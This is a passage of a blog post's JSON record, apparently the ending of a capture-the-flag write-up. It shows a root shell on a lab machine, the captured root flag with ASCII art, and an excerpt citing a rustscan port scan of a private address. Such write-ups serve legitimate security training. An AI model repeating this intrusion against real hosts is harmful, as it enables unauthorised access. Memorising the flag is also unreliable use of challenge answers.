Sep 30  2022 .ssh\n-rw-r--r--  1 root root  173 Oct  1  2022 .wget-hsts\nroot@apaches:~# cat root.txt \n\n         \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557  \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\n        \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\n        \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\n        \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u255d \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d  \u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\n        \u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2551  \u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\n        \u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u255d     \u255a\u2550\u255d  \u255a\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\n            ............                                                        \n                 ........,,,,,,,                                                \n                      ....,,,,.......                                           \n                            .............                                       \n                                 ............                                   \n     .................,,,,,,,,....     ........                                 \n                , ,,,,,,,,,,,,............ .......                              \n                                     .........  ....                            \n                                    ..................                          \n                                ,,....................                          \n                              *,,,,,,,,,,,,,,,,,,,,,,.                          \n                             ***,,,,,,,,,,,,,,,,,,,,,.........                  \n                            *****,,,,,,,,,,,,,,,,,,,.......,,,,,                \n                           \/\/\/\/\/**,,,,,,,,,,,,,,,,,,......,,,,,,.               \n                           \/\/\/\/\/\/\/\/,******,,,,,,,,,......,,,,,,,,               \n                          \/\/\/\/\/\/\/\/\/\/\/*************.,,,,,,,,,,,,,                \n                          \/\/\/\/\/\/\/\/\/\/\/\/*********,,,....,,,,,,,,,,,               \n                           \/\/\/\/\/\/\/\/\/\/\/\/\/***,,,,,,........,,,,,,....             \n                          .\/\/\/\/\/******,,,,,,,,,,.....,......,,......            \n                          **********,,,,,,,,,,,,...,,,,.....,,........          \n                          *******,,,,,,,,,,,,,,..,,,,,,,.,,,,,,,.               \n                         ******,,,,,,,,,,,,,,,,,........,,,,,,,,,               \n                        ,****,,,,,,,,,,,,,,,,,,,,.......,,,,..,,,               \n                       ***,,,,,,,,,,,,,,,,,,,,,,,,.....,,......                 \n                     ***,...,,,,,,,,,,,,,,,,,,,,,,,.............                \n                        ((,,,,,,,,,,,,,,,,,,,,,,,,,.                            \n                      *((((((((,,,,,,,,,,,,,,,,,,,,                             \n                                       ,,,,,,,,,,,                              \n                                          \/,,,,..                               \n                                              ,...                              \n                                                 ,.                             \n\n                Awesome, you have captured the root flag!!!!!\n\nFlag: OneSingleVulnerabilityAllAnAttackerNeeds<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
Apache \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 192.168.0.160 — -A Open 1 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-592","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/592","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=592"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/592\/revisions"}],"predecessor-version":[{"id":593,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/592\/revisions\/593"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=592"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=592"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=592"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}